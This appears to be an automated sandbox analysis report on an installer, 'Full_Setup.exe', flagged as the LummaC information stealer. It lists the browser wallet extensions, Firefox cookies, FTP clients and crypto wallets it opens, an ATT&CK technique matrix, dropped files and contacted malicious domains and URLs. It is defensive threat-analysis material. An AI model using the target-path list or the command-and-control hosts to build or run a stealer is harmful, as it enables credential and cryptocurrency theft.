Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Full_Setup.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: Full_Setup.exe PID: 7048, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Full_Setup.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	221 Virtualization/Sandbox Evasion	LSASS Memory	521 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	221 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	2 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	21 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	234 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Full_Setup.exe	19%	Virustotal		Browse
Full_Setup.exe	26%	ReversingLabs	Win32.Trojan.Lumma

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	74%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)	8%	ReversingLabs
C:\Users\user\AppData\Roaming\ColorStreamLib\is-IOQ9H.tmp	8%	ReversingLabs

Source	Detection	Scanner	Label
https://klipvumisui.shop/~	100%	Avira URL Cloud	malware
https://aloofysofar.click/$$	0%	Avira URL Cloud	safe
https://cegu.shop:443/8574262446/ph.txt	100%	Avira URL Cloud	malware
https://klipvumisui.shop/	100%	Avira URL Cloud	malware
https://aloofysofar.click:443/apiA	0%	Avira URL Cloud	safe
https://klipvumisui.shop:443/int_clp_sha.txt	100%	Avira URL Cloud	malware
http://michaeluno.jp/4	0%	Avira URL Cloud	safe
http://www.autohotkey.comCould	0%	Avira URL Cloud	safe
https://aloofysofar.click/api	0%	Avira URL Cloud	safe
https://cegu.shop:443/8574262446/ph.txtc	100%	Avira URL Cloud	malware
https://aloofysofar.click/h	0%	Avira URL Cloud	safe
aloofysofar.click	0%	Avira URL Cloud	safe
https://aloofysofar.click:443/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
aloofysofar.click	172.67.196.191	true	true	unknown
klipvumisui.shop	104.21.37.128	true	false	high
dfgh.online	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
https://aloofysofar.click/api	true	Avira URL Cloud: safe	unknown
cloudewahsj.shop	false		high
nearycrepso.shop	false		high
abruptyopsn.shop	false		high
https://klipvumisui.shop/int_clp_sha.txt	false		high
aloofysofar.click	true	Avira URL Cloud: safe	unknown
wholersorie.shop	false		high
noisycuttej.shop	false		high
https://cegu.shop/8574262446/ph.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Full_Setup.exe, 00000000.00000003.1951278700.0000000003E1F000.00000004.00000800.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.exe, 00000006.00000000.2014058921.0000000000721000.00000020.00000001.01000000.00000008.sdmp, 8R65FTCZQK06W5IFC.exe.0.dr	false		high
https://certs.securetrust.com/CA0:	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop:443/int_clp_sha.txt	Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.usertr	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.vikingcloud.com/TWGCA.crl0t	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.starfieldtech.com/0D	Full_Setup.exe	false		high
https://certs.securetrust.com/CA05	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/~	Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.0000000000915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.1962949630.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.remobjects.com/ps	8R65FTCZQK06W5IFC.exe, 00000006.00000003.2018414218.0000000002B0F000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.exe, 00000006.00000003.2027489332.000000007F1BB000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000000.2034155286.0000000000091000.00000020.00000001.01000000.00000009.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000000.2052194709.000000000075D000.00000020.00000001.01000000.0000000C.sdmp, 8R65FTCZQK06W5IFC.tmp.8.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	8R65FTCZQK06W5IFC.exe, 00000006.00000003.2018414218.0000000002B0F000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.exe, 00000006.00000003.2027489332.000000007F1BB000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000000.2034155286.0000000000091000.00000020.00000001.01000000.00000009.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000000.2052194709.000000000075D000.00000020.00000001.01000000.0000000C.sdmp, 8R65FTCZQK06W5IFC.tmp.8.dr	false		high
https://cegu.shop:443/8574262446/ph.txtc	Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
